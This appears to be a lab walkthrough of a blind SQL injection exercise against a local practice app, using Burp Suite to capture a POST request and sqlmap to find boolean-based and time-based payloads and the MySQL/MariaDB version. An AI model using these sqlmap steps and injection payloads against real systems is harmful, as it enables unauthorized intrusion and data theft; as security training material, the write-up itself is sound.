### Objective

Find the version of the SQL database software through a blind SQL attack.

Again, I'm not very good at manual SQL injection so I will be utilizing BurpSuite and sqlmap.

Like last time, let's intercept the request and feed it to sqlmap.
```html
POST /vulnerabilities/sqli_blind/ HTTP/1.1
Host: localhost:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://localhost:5000
DNT: 1
Connection: close
Referer: http://localhost:5000/vulnerabilities/sqli_blind/
Cookie: PHPSESSID=fn0sd2tgqu0v4qb518ob8brqa6; security=medium
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

id=1&Submit=Submit
```
Feed it to sqlmap.
```bash
sqlmap -l sql
```
And it'll run tests on it.In the end we'll get this.
```bash
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 240 HTTP(s) requests:
---
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5650=5650&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 5870 FROM (SELECT(SLEEP(5)))oiJr)&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[20:00:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)

```